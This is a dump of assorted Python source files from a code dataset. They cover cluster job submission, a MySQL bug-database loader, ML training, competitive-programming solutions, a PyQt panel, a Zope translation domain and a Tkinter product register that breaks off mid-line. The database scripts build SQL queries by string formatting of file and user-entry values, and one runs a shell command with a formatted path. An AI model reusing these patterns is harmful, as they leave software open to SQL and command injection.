memory\n-mem-per-cpu=MB Maximum amount of real memory per allocated cpu\n required by a job\n-nodes=N Number of nodes on which to run (N = min[-max])\n-pe -serial=n Number of tasks to invoke on each node\n-M a\t Notify user by email when certain event types\n occur. Valid type values are BEGIN, END, FAIL,\n REQUEUE, and ALL (any state change)\n'''\n\ndef run_stage(state, stage, command):\n '''Run a pipeline stage, either locally or on the cluster'''\n\n # Grab the configuration options for this stage\n config = state.config\n modules = config.get_stage_option(stage, 'modules')\n mem = config.get_stage_option(stage, 'mem') * MEGABYTES_IN_GIGABYTE \n account = config.get_stage_option(stage, 'account')\n queue = config.get_stage_option(stage, 'queue')\n walltime = config.get_stage_option(stage, 'walltime')\n run_local = config.get_stage_option(stage, 'local')\n cores = config.get_stage_option(stage, 'cores')\n pipeline_id = config.get_option('pipeline_id')\n job_name = pipeline_id + '_' + stage\n\n # Generate a \"module load\" command for each required module\n \n module_loads = '. /etc/profile.d/module.sh\\n' + '\\n'.join(['module load ' + module for module in modules])\n cluster_command = '\\n'.join([module_loads, command])\n\n #Specify job-specific options for SGE\n job_options = '-q {queue} -pe serial {cores} -l docker=1 -l h_vmem={mem}M -M {account}'.format( cores=cores, queue=queue, mem=mem, account=account) \n\n\n # Log a message about the job we are about to run\n log_messages = ['Running stage: {}'.format(stage),\n 'Command: {}'.format(command)]\n if not run_local:\n log_messages.append('Job options: {}'.format(job_options))\n state.logger.info('\\n'.join(log_messages))\n\n # Run the job, capturing stdout and stderr\n stdout_res, stderr_res = None, None\n try:\n stdout_res, stderr_res = \\\n run_job(cmd_str=cluster_command,\n job_name = job_name,\n logger = state.logger.proxy,\n drmaa_session = state.drmaa_session,\n # Determines whether to run the command on the local\n # machine or run it on the cluster\n run_locally = run_local,\n # Keep a copy of the job script for diagnostic purposes\n retain_job_scripts = True,\n #retain_stdout = True,\n #retain_stderr = True,\n job_script_directory = state.options.jobscripts, \n job_other_options = job_options)\n except error_drmaa_job as err:\n raise Exception(\"\\n\".join(map(str, [\"Failed to run:\", command, err, stdout_res, stderr_res])))\n","sub_path":"src/runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":3321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"162395008","text":"from FgzWriter import FgzWriter\nfrom ..files import Dir\n\nclass FgzPacker:\n\tdef __init__(self,working_dir,target_dir):\n\t\tself.m_workingDir=[]\n\t\tfor d in working_dir:\n\t\t\tself.m_workingDir.append(Dir.Dir_toStdName(d))\n\n\t\tself.m_targetDir=Dir.Dir_toStdName(target_dir)\n\t\tself.m_packageName=\"fdata.fgz\"\n\n\t\tself.m_ignoreFileExt=[]\n\t\tself.m_notCompressFileExt=[]\n\n\t\n\tdef setPackageName(self,name):\n\t\tself.m_packageName=name \n\n\tdef setIngoreFileExt(self,exts):\n\t\tself.m_ignoreFileExt=exts \n\n\tdef setNotCompressFileExt(self,exts):\n\t\tself.m_notCompressFileExt=exts\n\n\tdef ingoreFile(self,filename):\n\t\tfor ext in self.m_ignoreFileExt:\n\t\t\tif filename.endswith(ext):\n\t\t\t\treturn True \n\n\t\treturn False\n\n\tdef notCompressFile(self,filename):\n\t\tfor ext in self.m_notCompressFileExt:\n\t\t\tif filename.endswith(ext):\n\t\t\t\treturn True \n\n\t\treturn False\n\n\n\n\n\n\n\tdef pack(self):\n\t\tpack_files=[]\n\t\tfor d in self.m_workingDir:\n\t\t\tdiry=Dir.Dir(d)\n\t\t\tall_files=diry.listFiles()\n\t\t\tall_files=[f for f in all_files if not self.ingoreFile(f) ]\n\t\t\tpack_files.append({\"dir\":d,\"files\":all_files})\n\n\n\t\twriter=FgzWriter()\n\t\tfor info in pack_files:\n\t\t\tdirname=info[\"dir\"]\n\t\t\tfiles=info[\"files\"]\n\n\t\t\tfor f in files:\n\t\t\t\tif self.notCompressFile(f):\n\t\t\t\t\tmethod=\"store\"\n\t\t\t\telse:\n\t\t\t\t\tmethod=\"deflate\"\n\n\t\t\t\tfile_name=dirname+f\n\t\t\t\twriter.addFile(file_name,f,method)\n\n\t\tpackage_path=self.m_targetDir+self.m_packageName\n\t\twriter.pack(package_path)\n\n\n\n\n\n\n\n\n","sub_path":"tool/binpy/libpy/data/FgzPacker.py","file_name":"FgzPacker.py","file_ext":"py","file_size_in_byte":1409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"132600908","text":"import mysql.connector\nimport argparse\nimport subprocess\nimport json\n\n\nPIPE = subprocess.PIPE\n\ndef getfullpath(model):\n\tr = subprocess.run(\"pwd\",shell= True,stdout=PIPE)\n\tpath=r.stdout.decode().strip()\n\treturn \"{}/{}\".format(path,model)\n\ndef getbuglist(path):\n\tr = subprocess.run(\"ls -1 {}\".format(path),shell = True, stdout = PIPE)\n\tlines=r.stdout.decode().strip()\n\tlines=lines.split(\"\\n\")\n\trl = []\n\tfor l in lines:\n\t\trl.append((l,\"{}/{}\".format(path,l)))\n\treturn rl \n\ndef get_tags_list(path):\n\tfilename=\"{}/tag.json\".format(path)\n\tdata = {'Tags':[]}\n\twith open(filename) as f:\n\t\tlines = f.read().strip()\n\t\tif lines != \"\":\n\t\t\tdata=json.loads(lines)\n\n\treturn data['Tags']\n\nif __name__ == \"__main__\":\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument('-host', required = True)\n\tparser.add_argument('-user',required = True)\n\tparser.add_argument('-passwd',required=False)\n\tparser.add_argument('-database',required=True)\n\targs = parser.parse_args()\n\tpassword = args.passwd if args.passwd != None else \"\"\n\tmydb = mysql.connector.connect( host=args.host, user=args.user, passwd=password, database=args.database)\n\tmycursor = mydb.cursor()\n\n\t# creating the tables\n\tmycursor.execute(\"DROP TABLE IF EXISTS bugRecord\")\n\tmycursor.execute(\"DROP TABLE IF EXISTS bugCollection\")\n\tmycursor.execute(\"DROP TABLE IF EXISTS bugCatagories\")\n\tmycursor.execute(\"DROP TABLE IF EXISTS programmingModel\")\n\n\n\tmycursor.execute(\"CREATE TABLE bugCollection (ID INT AUTO_INCREMENT PRIMARY KEY, name VARCHAR(255) UNIQUE, folderPath VARCHAR(255) ) \")\n\tmycursor.execute(\"CREATE TABLE bugCatagories (ID INT AUTO_INCREMENT PRIMARY KEY, name VARCHAR(255) UNIQUE) \")\n\tmycursor.execute(\"CREATE TABLE programmingModel(ID INT AUTO_INCREMENT PRIMARY KEY, name VARCHAR(255)UNIQUE ) \")\n\t\n\tmycursor.execute(\"CREATE TABLE bugRecord (ID INT AUTO_INCREMENT PRIMARY KEY, Bug_id INTEGER, PM_id INTEGER, Cate_id INTEGER,\\\n\t\tFOREIGN KEY(Bug_id) REFERENCES bugCollection(ID),\\\n\t\tFOREIGN KEY(PM_id) REFERENCES programmingModel(ID),\\\n\t\tFOREIGN KEY(Cate_id ) REFERENCES bugCatagories(ID))\")\n\tmydb.commit()\n\t# insert into tables\n\n\t# insert data into programming model table\n\tmodels = [\"MPI\",\"OPENMP\", \"CUDA\"]\n\tfor model in models:\n\t\tsql = \"INSERT INTO programmingModel (name) VALUES ('{}')\".format(model)\n\t\tmycursor.execute(sql)\n\t\n\tmydb.commit()\n\t\n\n\t# insert data into other tables\n\tfor model in models:\n\t\tfullpath=getfullpath(model)\n\t\t#print(fullpath)\n\t\tbuglist=getbuglist(fullpath)\n\t\tfor bug,path in buglist:\n\t\t\t#print(bug,path)\n\n\t\t\t#insert into bug collection table\n\t\t\tsql = \"INSERT INTO bugCollection (name, folderPath) VALUES (%s, %s)\"\n\t\t\tvalue=(\"{}_{}\".format(model,bug),path)\n\t\t\tmycursor.execute(sql, value)\n\t\t\tmydb.commit()\n\t\t\tbug_id = mycursor.lastrowid\n\n\t\t\t#insert into bug categories table\n\t\t\ttags = get_tags_list(path)\n\t\t\tfor t in tags:\n\t\t\t\tsql = \"INSERT IGNORE INTO bugCatagories (name) VALUES ('{}')\".format(t)\n\t\t\t\tmycursor.execute(sql)\n\t\t\t\tmydb.commit()\n\n\t\t\t#insert into bug record table\n\t\t\tget_pm_id_query = \"select ID from programmingModel where name = '{}'\".format(model)\n\t\t\tmycursor.execute(get_pm_id_query)\n\t\t\tpm_id = mycursor.fetchone()[0]\n\n\t\t\tfor t in tags:\n\t\t\t\tget_tag_id_query = \"select ID from bugCatagories where name = '{}'\".format(t)\n\t\t\t\tmycursor.execute(get_tag_id_query)\n\t\t\t\ttag_id = mycursor.fetchone()[0]\n\t\t\t\tsql = \"INSERT INTO bugRecord (Bug_id,PM_id, Cate_id) VALUES ({},{},{})\".format(bug_id,pm_id,tag_id)\n\t\t\t\t#value = (bug_id,pm_id,tag_id)\n\t\t\t\tmycursor.execute(sql)\n\t\t\tmydb.commit()\n\n\n","sub_path":"bug_database_with_UI_iteration0/Bug_Collection/Data_Populate.py","file_name":"Data_Populate.py","file_ext":"py","file_size_in_byte":3473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"66617472","text":"s = list(input())\nk = int(input())\n\ndef count_replace(l):\n ret = 0\n cnt = 1\n for i in range(len(l)-1):\n if l[i] == l[i+1]: #\n cnt += 1\n elif l[i] != l[i+1]:\n ret += cnt//2\n cnt = 1\n ret += cnt // 2 # 最後尾(ループが尽きた)のための処理. 末尾が連続していた場合には連続分が追加、それ以外は0が追加\n return ret\n\nif len(set(s)) == 1: # すべての文字が同じとき\n ans = (len(s) * k) // 2\nelif s[0] != s[-1]: #先頭末尾が一致しないとき\n ans = count_replace(s)\n ans = k * ans\nelse: # 先頭末尾が一致\n # 先頭の連続する文字数\n cnt_pre = 1\n for i in range(len(s)-1):\n if s[i] == s[i+1]:\n cnt_pre += 1\n else:\n break\n # 末尾の連続する文字数\n cnt_pos = 1\n for i in reversed(range(len(s))):\n if s[i] == s[i-1]:\n cnt_pos += 1\n else:\n break\n # 先頭の連続数//2+末尾の連続数//2+(k-1)*(先頭+末尾)の連続数//2\n ans = cnt_pre//2 + cnt_pos//2 + (k-1) * ((cnt_pos+cnt_pre)//2)\n # 先頭、末尾以外の部分のカウント\n ret = count_replace(s[cnt_pre:-cnt_pos])\n ans += k * ret\n\nprint(ans)","sub_path":"Python_codes/p02891/s689177862.py","file_name":"s689177862.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"304399280","text":"#!/usr/bin/env python\n\ndef get_server_state(netdict,cpuinfo,cpuload,memfree,tcpcount,syncount):\n state = {}\n use = cpuinfo\n load = cpuload\n mem = memfree\n tcp = tcpcount\n syn = syncount\n inflow = round(float(netdict['inflow'])/1024/1024*8,2)\n outflow = round(float(netdict['outflow'])/1024/1024*8,2)\n inpackage = netdict['inpackage']\n outpackage = netdict['outpackage']\n #cpu\n if int(use) > 50:\n cpuuse = 1\n else:\n cpuuse = 0\n if float(load[1]) > 100:\n cpuload = 1\n elif float(load[2]) > 100:\n cpuload = 1\n else:\n cpuload = 0\n state['use'] = cpuuse\n state['load'] = cpuload\n #mem\n if int(mem) < 10:\n memuse = 1\n else:\n memuse = 0\n state['mem'] = memuse\n #count\n if int(tcp) > 10000:\n count = 1\n elif int(syn) > 300:\n count = 1\n else:\n count = 0\n state['count'] = count\n #network\n if int(inflow) > 300:\n flow = 1\n elif int(outflow) > 1000:\n flow = 1\n else:\n flow = 0\n if int(inpackage) > int(outpackage):\n package = 1\n else:\n package = 0\n state['flow'] = flow\n state['package'] = package\n \n return state\n","sub_path":"monitor-client/linux/sysstate.py","file_name":"sysstate.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"113798941","text":"def sum2(nums):\n sum = 0\n if len(nums) == 0:\n return 0\n elif len(nums) <= 2:\n for i in nums:\n sum += i\n else:\n for i in range(2):\n sum += nums[i]\n return sum","sub_path":"lab7/codingBat/list-1/sum2.py","file_name":"sum2.py","file_ext":"py","file_size_in_byte":215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"87373339","text":"\nfrom django.contrib import admin\nfrom django.urls import path, include\n\n\nurlpatterns = [\n path('api-auth/', include('rest_framework.urls')),\n path('admin/', admin.site.urls),\n path('api/', include('articles.urls')),\n #path('api/v1/auth/login/',LoginView.as_view()),\n #path('api/v1/auth/logout/',LogoutView.as_view()),\n #path('api/v1/auth/', include ('rest_framework.urls'))\n]\n","sub_path":"djangoreact/backend/src/djangoreact/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"188715426","text":"import torch.nn as nn\nfrom model.net import *\nimport torch.utils.data as data\nimport numpy as np\nfrom utils import helper\nimport random\nimport torch\nimport torch.optim as optim\nfrom torch.optim import lr_scheduler\nfrom torch.utils.data import DataLoader\nfrom tqdm import tqdm\nimport copy\nimport os\nclass voxnet(nn.Module):\n def __init__(self):\n super().__init__()\n self.body = frequency_encoder()\n self.end_line = nn.Linear(256,40)\n\n def forward(self,x):\n x = self.body(x)\n x = x.view(x.size(0),-1)\n return self.end_line(x)\n\nclass genvoxnetDataset(data.Dataset):\n def __init__(self, npz_file):\n data = np.load(npz_file)\n self.vox = data['vox']\n self.target = data['target']\n self.freq = data['freq']\n self.filename = data['filename']\n\n def trans(self,filename):\n self.label = np.zeros(len(self.vox))\n self.type = []\n for i in range(len(self.vox)):\n name = self.filename[i].split('\\\\')[-1][:-9]\n if not name in self.type:\n self.type.append(name)\n for i in range(len(self.vox)):\n name = self.filename[i].split('\\\\')[-1][:-9]\n self.label[i] = self.type.index(name)\n\n np.savez_compressed(filename,\n vox=self.vox,\n target=self.target,\n freq=self.freq,\n filename=self.filename,\n label=self.label\n )\n \n\ndef gen_full_dataset():\n genvoxnetDataset('dataset\\\\test\\\\all.npz').trans('dataset\\\\test\\\\all_full.npz')\n genvoxnetDataset('dataset\\\\train\\\\all.npz').trans('dataset\\\\train\\\\all_full.npz')\n\n\ndef rotate(x,axis = [0,2]):\n k = random.randint(0,3)\n for i in x:\n if x[i].dim() < 2:\n continue\n x[i] = torch.rot90(x[i],k,axis)\n return x\n\nclass voxnetDataset(data.Dataset):\n def __init__(self, npz_file):\n data = np.load(npz_file)\n self.vox = data['vox']\n self.label = data['label']\n def __len__(self):\n return len(self.vox)\n\n def __getitem__(self, idx):\n\n vox = self.vox[idx]\n label = self.label[idx]\n\n item = {\n 'vox': torch.as_tensor(vox, dtype=torch.float32),\n 'label': torch.as_tensor(label, dtype=torch.long),\n }\n\n item = rotate(item)\n\n return item\n\ndef train():\n loader = {\n 'train':DataLoader(voxnetDataset('dataset\\\\train\\\\all_full.npz'), batch_size=32,shuffle=True,drop_last=True,num_workers=0),\n 'test':DataLoader(voxnetDataset('dataset\\\\test\\\\all_full.npz'), batch_size=32,shuffle=True,drop_last=True,num_workers=0),\n }\n model = voxnet().cuda()\n optimizer = optim.Adam(model.parameters(), lr=0.01)\n scheduler = lr_scheduler.StepLR(optimizer, step_size=20, gamma=0.5)\n root_dir = 'result\\\\voxnet'\n best_loss = None\n for epoch in range(100):\n for phase in ['train', 'test']:\n losses = []\n correct = 0.\n all = 0.\n for i, data in tqdm(enumerate(loader[phase])):\n optimizer.zero_grad()\n inputs = data['vox'].cuda()\n labels = data['label'].cuda()\n \n with torch.set_grad_enabled(phase == 'train'):\n outputs = model(inputs)\n loss = nn.CrossEntropyLoss()(outputs, labels)\n losses.append(loss.item())\n _, predicted = torch.max(outputs.detach(), 1)\n all += len(inputs)\n correct += (predicted == labels).cpu().sum()\n if phase == 'train':\n loss.backward()\n optimizer.step()\n \n loss = np.array(losses).mean()\n print(phase + ':',loss)\n print('acc:{}'.format(correct / all))\n if phase == 'test':\n if best_loss is None or best_loss > loss:\n best_loss = loss\n best_model_wts = copy.deepcopy(model.state_dict())\n if epoch % 20 == 0:\n torch.save(best_model_wts, os.path.join(root_dir, 'voxnet_best.weights'))\n else:\n scheduler.step()\n\nif __name__ == \"__main__\":\n train()","sub_path":"voxnet.py","file_name":"voxnet.py","file_ext":"py","file_size_in_byte":4268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"551204304","text":"#!/usr/bin/python\n\"\"\"Merge numpy matrices. Use any 'True' value as merged value.\n\nEXAMPLE USE:\npython merge.py GSE2034.GPL96.eQTL.tab.compiled.values.npy GSE2034.GPL96.eQTL.tab.missing.values.npy GSE2034.GPL96.eQTL.tab.low25.values.npy\n\"\"\"\n\nimport sys\nimport numpy as np\nfrom py_symmetric_matrix import *\n\ndef main(m_files):\n M = np.load(m_files[0])\n for m_file in m_files[1:]:\n Q = np.load(m_file)\n for i, v in enumerate(Q):\n if v:\n M[i] = v\n np.save(m_files[0]+\".merged.%d.npy\" % len(m_files), M)\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","sub_path":"merge.py","file_name":"merge.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"163828143","text":"from PyQt4 import QtGui, QtCore\n\nclass DeviceConfigPanel(QtGui.QWidget):\n def __init__(self, parent):\n QtGui.QWidget.__init__(self, parent)\n\n self.parent = parent\n \n #Status\n self.errorMessage = QtGui.QCommandLinkButton(\"The Device browser has not been fully implemented yet.\", self)\n self.errorMessage.resize(500,60)\n self.errorMessage.setIcon(QtGui.QIcon(\"Icons/cross.png\"))\n self.errorMessage.setEnabled(False)\n \n \n \n def resizeEvent(self,event):\n self.moveComponents()\n \n def moveComponents(self):\n self.errorMessage.move(self.width()/2-240, self.height()/2-30)\n \n \n def paintEvent(self, event):\n paint = QtGui.QPainter()\n paint.begin(self)\n \n size = self.size()\n w = size.width()\n h = size.height()\n \n paint.setPen(QtGui.QColor(200,200, 200))\n paint.setBrush(QtGui.QColor(235, 235, 235))\n paint.drawRect(0,0,w,h)\n \n paint.end()\n \n \n","sub_path":"Coherence-Config/Coherence-Config/UI/DeviceConfigPanel.py","file_name":"DeviceConfigPanel.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"541663384","text":"##############################################################################\n#\n# Copyright (c) 2001, 2002 Zope Foundation and Contributors.\n# All Rights Reserved.\n#\n# This software is subject to the provisions of the Zope Public License,\n# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.\n# THIS SOFTWARE IS PROVIDED \"AS IS\" AND ANY AND ALL EXPRESS OR IMPLIED\n# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS\n# FOR A PARTICULAR PURPOSE.\n#\n##############################################################################\n\"\"\"This is a simple implementation of the ITranslationDomain interface.\n\"\"\"\nfrom zope.component import getUtility\nfrom zope.interface import implementer\n\nfrom zope.i18n import interpolate\nfrom zope.i18n.interfaces import INegotiator\nfrom zope.i18n.interfaces import ITranslationDomain\n\n\n@implementer(ITranslationDomain)\nclass SimpleTranslationDomain:\n \"\"\"This is the simplest implementation of the ITranslationDomain I\n could come up with.\n\n The constructor takes one optional argument 'messages', which will be\n used to do the translation. The 'messages' attribute has to have the\n following structure:\n\n {('language', 'msg_id'): 'message', ...}\n\n Note: This Translation Domain does not use message catalogs.\n \"\"\"\n\n # See zope.i18n.interfaces.ITranslationDomain\n domain = None\n\n def __init__(self, domain, messages=None):\n \"\"\"Initializes the object. No arguments are needed.\"\"\"\n self.domain = (\n domain.decode(\"utf-8\") if isinstance(domain, bytes) else domain)\n self.messages = messages if messages is not None else {}\n assert self.messages is not None\n\n def translate(self, msgid, mapping=None, context=None,\n target_language=None, default=None, msgid_plural=None,\n default_plural=None, number=None):\n '''See interface ITranslationDomain'''\n # Find out what the target language should be\n if target_language is None and context is not None:\n langs = [m[0] for m in self.messages.keys()]\n # Let's negotiate the language to translate to. :)\n negotiator = getUtility(INegotiator)\n target_language = negotiator.getLanguage(langs, context)\n\n # Find a translation; if nothing is found, use the default\n # value\n if default is None:\n default = str(msgid)\n text = self.messages.get((target_language, msgid))\n if text is None:\n text = default\n return interpolate(text, mapping)\n","sub_path":"src/zope/i18n/simpletranslationdomain.py","file_name":"simpletranslationdomain.py","file_ext":"py","file_size_in_byte":2669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"403755724","text":"# plugging in adapters\r\n# socket has 0 jolts\r\n# an adapter with n jolts takes >=(n-3) jolts as input, outputs n jolts\r\n# device has a built-in joltage adapter for 3 + max(external adapters)\r\n# how many legal arrangements are there?\r\n\r\n# input\r\nwith open('10.txt', 'r') as file:\r\n input = file.read()\r\n\r\n# turn the input into a list, one element is one number as a string\r\ninput_list = list(input.split('\\n'))\r\n# get a list of numbers instead of strings\r\n# append on socket joltage\r\n# append on device joltage\r\n# sort\r\nadapters = [int(n) for n in input_list]\r\nadapters.append(0)\r\nadapters.append(max(adapters) + 3)\r\nadapters.sort()\r\n\r\n# look at the list of vital adapters\r\n# (socket, device, or either side of a break of 3)\r\nvital_adapters = []\r\nvital_adapters.append(0)\r\nfor i in range(0, len(adapters)-1):\r\n if adapters[i+1] - adapters[i] == 3:\r\n # either side of a break of 3, and hasn't been added already\r\n if not i in vital_adapters:\r\n vital_adapters.append(i)\r\n if not i+1 in vital_adapters:\r\n vital_adapters.append(i+1)\r\n\r\n# naively getting all legal arrangements of a string of non-vitals\r\n# between two vitals a and b\r\ndef nv(nab: int):\r\n if nab < 0:\r\n return 1\r\n elif nab == 0:\r\n return 1\r\n elif nab == 1:\r\n return 2\r\n elif nab == 2:\r\n return 4\r\n else: # cannot jump directly, but can go to 1, 2, or 3 away\r\n return nv(nab - 1) + nv(nab - 2) + nv(nab - 3)\r\n\r\nnum_arrangements = 1 # start off by assuming the only arrangement is using all adapters\r\nfor j in range(0,len(vital_adapters)-1): # for every vital adapter with a vital adapter after it\r\n # print(num_arrangements)\r\n # find maximum number of adapters between this vital adapter and the next\r\n # nab = number adapters between\r\n # (the -1 ensures that the next vital adapter is excluded)\r\n nab = vital_adapters[j+1] - vital_adapters[j] - 1\r\n # followed by a (possibly empty) string of non-vitals\r\n # nab=0 => adapters[vital_adapters[j]] is right before a vital adapter\r\n # need to check how many possible arrangements there are\r\n # no jumps of 2, so these will all be 1 apart\r\n num_arrangements = num_arrangements * nv(nab)\r\n # for debugging:\r\n #print('\\nbetween adapters at pos ' + str(vital_adapters[j]) + ' and ' + str(vital_adapters[j+1]))\r\n #print('(with joltage ' + str(adapters[vital_adapters[j]]) + ' and ' + str(adapters[vital_adapters[j+1]]) + ')')\r\n #print(str(adapters[vital_adapters[j]:vital_adapters[j+1]+1]))\r\n #print('we have this many non-vitals in between: ' + str(nab))\r\n #print('which has this many arrangements: ' + str(nv(nab)))\r\n\r\n# show vital adapters:\r\n#print([adapters[i] for i in vital_adapters])\r\nprint(num_arrangements)","sub_path":"10b.py","file_name":"10b.py","file_ext":"py","file_size_in_byte":2761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"322196549","text":"from django.conf.urls import patterns, include, url\nfrom django.contrib import admin\nimport views\nimport settings\nimport os\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n # Examples:\n # url(r'^$', 'django_docker.views.home', name='home'),\n # url(r'^blog/', include('blog.urls')),\n\n url(r'^admin/', include(admin.site.urls)),\n\turl(r'^$', views.index),\n\turl(r'^index/$', views.index),\n\turl(r'^submit/$', views.submit),\n\turl(r'^search/$', views.search),\n\turl(r'^preview/$', views.preview),\n\turl(r'^static/(?P.*)$', 'django.views.static.serve', {'document_root': os.path.dirname(__file__)+'/static'}),\n\t#url(r'^success/$', views.success),\n\turl(r'^student/insert/$', views.student_insert),\n\turl(r'^student/insert$', views.student_insert),\n\turl(r'^student/find/$',views.student_find),\n)\n","sub_path":"django_docker/django_docker/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"596512615","text":"import pandas as pd\nimport pytest\nimport logging\nimport pickle\nfrom joblib import load\nimport numpy as np\nfrom pandas.core.frame import DataFrame\n\nlogging.basicConfig(\n filename='./test/test_data.log',\n level=logging.INFO,\n filemode='w',\n format='%(name)s - %(levelname)s - %(message)s')\n\ncat_features = [\n \"workclass\",\n \"education\",\n \"marital-status\",\n \"occupation\",\n \"relationship\",\n \"race\",\n \"sex\",\n \"native-country\",\n]\n\n@pytest.fixture\ndef data():\n '''\n This fixture returns the data for the tests\n output:\n dataframe: pandas dataframe\n '''\n try:\n dataframe = pd.read_csv('data/clean_sample.csv')\n logging.info(\"import data: SUCCESS\")\n return dataframe\n except FileNotFoundError as err:\n logging.error(\"import data: The file wasn't found\")\n raise err\n\n\ndef test_data_shape(data):\n \"\"\" \n If your data is in the correct shape\n input:\n data: pandas dataframe\n \"\"\"\n assert data.shape[0] > 0, \"The dataframe has no columns\"\n assert data.shape[1] > 0, \"The dataframe has no rows\"\n\ndef test_columns_present(data):\n \"\"\" \n If columns are present in dataframe\n input:\n data: pandas dataframe\n \"\"\"\n for category in cat_features:\n assert category in data.columns, \"The column {} is not in the dataframe\".format(category)\n assert data[category].shape[0] > 0, \"The column {} is empty\".format(category)\n\ndef test_data_types(data):\n \"\"\" \n If data types are correct\n input:\n data: pandas dataframe\n \"\"\"\n for category in cat_features:\n assert data[category].dtype == 'object', \"The column {} is not of type object\".format(category)\n \n","sub_path":"test_data.py","file_name":"test_data.py","file_ext":"py","file_size_in_byte":1753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"332433746","text":"import tkinter as gui\nfrom tkinter import messagebox\nfrom tkinter import *\nfrom tkinter import ttk\nimport mysql.connector # pip install mysql-connector\nimport pymysql # pip install pymysql\nimport time\n\ndef MainProdutos():\n # Pega o maior valor da coluna cod_produtos para colocar na entry Cod\n connection = mysql.connector.connect(host=\"localhost\",user=\"root\",password=\"\",database=\"bdlanchonete\")\n mycursor = connection.cursor()\n sqlid = \"SELECT MAX(cod_produto) FROM produtos\"\n mycursor.execute(sqlid)\n for i in mycursor:\n print(i)\n teste = i\n\n def VisualisarProddutos():\n treeviewproduto.delete(*treeviewproduto.get_children()) #limpa a lista\n connection = mysql.connector.connect(host=\"localhost\",user=\"root\",password=\"\",database=\"bdlanchonete\")\n mycursor = connection.cursor() \n sqlid = \"select * from produtos;\"# sql para pegar os produto\n mycursor.execute(sqlid)\n \n for viwer in mycursor:\n treeviewproduto.insert(\"\",\"end\",values=(viwer))\n \n def CadastrarProdutos():\n connection = mysql.connector.connect(host=\"localhost\",user=\"root\",password=\"\",database=\"bdlanchonete\")\n mycursor = connection.cursor()\n\n\n # abrituindo os valores dos entry a uma variável-----------------\n ean = int(entryean.get())\n nome = str(entrynome.get())\n\n\n # verificando se o produto ja existem----------------------\n sqlselect = \"select * from produtos where ean_produto like {};\".format(ean)\n mycursor.execute(sqlselect)\n valido = mycursor.fetchall() # busca todas as linhas de um resultado de consulta. Ele retorna todas as linhas como uma lista de tuplas. Uma lista vazia é retornada se não houver nenhum registro para buscar.\n\n if len(valido) > 0:\n messagebox.showwarning(\"Warning\",\"Produto já cadastrado!\") \n\n else: # inserindo os dados no banco -----------------------------------\n sqlinsert = \"INSERT INTO produtos (ean_produto, nome_produto, categoria_produto,unidade_produto, descricão_produto, pre_venda_produto, pre_custo_produto, estoque) VALUES ('{}','{}','{}','{}','{}','{}','{}','{}')\".format(ean, nome, comboboxcat.get(),entryUnidade.get(), entrydescrição.get(\"1.0\",END), entryprevenda.get(), entryprecusto.get(), entryestoque.get())\n mycursor.execute(sqlinsert)\n\n \n entrycod[\"state\"] =\"normal\"\n entrycod.delete(0,END)\n entrycod.insert(0,teste[0]+2)\n entrycod[\"state\"] =\"disabled\"\n entryean.delete(0,END)\n entrynome.delete(0,END)\n comboboxcat.set(\"Selecione\")\n entrydescrição.delete(\"1.0\",END)\n entryprecusto.delete(0,END)\n entryprevenda.delete(0,END)\n entryestoque.delete(0,END)\n entryUnidade.delete(0,END)\n\n time.sleep(2)\n messagebox.showinfo(title=\"Info\",message=\"Produto cadastrado com sucesso!\")\n \n \n\n mycursor.close()\n connection.commit()\n connection.close()\n \n # elif nome in i:\n # messagebox.showwarning(\"Warning\",\"Produto já cadastrado!\\n\\nEsse nome já pertence a um produto existente.\")\n\n def ExcluirProdutos():\n connection = pymysql.connect(host=\"localhost\",user=\"root\",password=\"\",database=\"bdlanchonete\")\n mycursor = connection.cursor()\n\n codProd = str(cod_entry.get()) \n\n sqldelete = \"delete from produtos where cod_produto = {};\".format(codProd)\n mycursor.execute(sqldelete)\n # print(sqldelete)\n mycursor.close()\n connection.commit()\n connection.close()\n\n cod_entry.delete(0, END)\n\n time.sleep(2)\n messagebox.showinfo(\"Info\",\"Produto excluido.\")\n\n \n\n def EditarProdutos():\n def UpdateProdutos():\n \n connection = mysql.connector.connect(host=\"localhost\",user=\"root\",password=\"\",database=\"bdlanchonete\")\n mycursor = connection.cursor()\n\n\n entrycod[\"state\"] =\"normal\"\n cod = entrycod.get()\n entrycod[\"state\"] =\"disabled\" \n ean = entryean.get()\n nome = entrynome.get()\n \n prevenda = entryprevenda.get()\n precusto = entryprecusto.get()\n estoque = entryestoque.get()\n \n\n # Script de Update\n sqlupdate = \"UPDATE produtos SET ean_produto = {},nome_produto ='{}', categoria_produto='{}',unidade_produto= '{}', descricão_produto 